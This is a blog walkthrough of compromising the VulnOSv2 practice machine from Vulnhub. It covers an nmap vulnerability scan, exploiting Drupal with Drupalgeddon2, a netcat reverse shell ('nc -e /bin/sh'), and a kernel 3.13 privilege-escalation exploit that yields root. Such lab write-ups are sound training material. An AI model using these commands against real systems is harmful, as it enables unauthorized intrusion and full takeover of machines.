VulnOSv2 Vulnhub Machine Walkthrough

Today, We are working on VulnOSv2 machine from Vulnhub.

First lets find the IP.


So, is our machine’s IP.

Lets do a detailed scan now.

root@kali:~# nmap -p- -A -T5 -sV -O --script vuln
Starting Nmap 7.80 ( ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.00073s latency).
Not shown: 65532 closed ports
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
|   Found the following possible CSRF vulnerabilities: 
|     Path:
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     Path:
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     Path:
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5
|       CVE-2018-1312   6.8
|       CVE-2017-15715  6.8
|       CVE-2014-0226   6.8
|       CVE-2017-9788   6.4
|       CVE-2019-0217   6.0
|       CVE-2020-1927   5.8
|       CVE-2019-10098  5.8
|       CVE-2020-1934   5.0
|       CVE-2019-0220   5.0
|       CVE-2018-17199  5.0
|       CVE-2017-9798   5.0
|       CVE-2017-15710  5.0
|       CVE-2016-8743   5.0
|       CVE-2016-2161   5.0
|       CVE-2016-0736   5.0
|       CVE-2014-3523   5.0
|       CVE-2014-0231   5.0
|       CVE-2020-11985  4.3
|       CVE-2019-10092  4.3
|       CVE-2016-4975   4.3
|       CVE-2015-3185   4.3
|       CVE-2014-8109   4.3
|       CVE-2014-0118   4.3
|       CVE-2014-0117   4.3
|       CVE-2018-1283   3.5
|_      CVE-2016-8612   3.3
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.73 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Lets visit the website running in the machine.

Lets go to the website now.

Looks like the site is running on Drupal. Lets do a scan using Droopescan.

droopescan scan drupal -u

Seems like the Drupal version is 7.22 – 7.26

Lets look for vulnarabilites now.

Have a look here:

Looks like works in Drupal 7.x. Lets try that

ruby drupalgeddon2.rb

We got a shell! Lets check the user.

Time for Privilege escalation. First lets get a shell through netcat

Start a listener in kali.

root@kali:~# nc -nlvp 7777

and connect from victim machine.

nc -e /bin/sh 7777


Time for Privilege Escalation

Lets search for the OS information.

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Lets try the first one. Linux Kernel 3.13.0 < 3.19 exploit.

wget the file to machine.


Now rename the file to 37292.c and compile.

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure that the exploit is there. and enter ./exploit to run it.

and… We are root!

Lets find the flag.

cd /root
cat flag.txt

Lets do another machine next day!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-]

Leave a Reply

Your email address will not be published. Required fields are marked *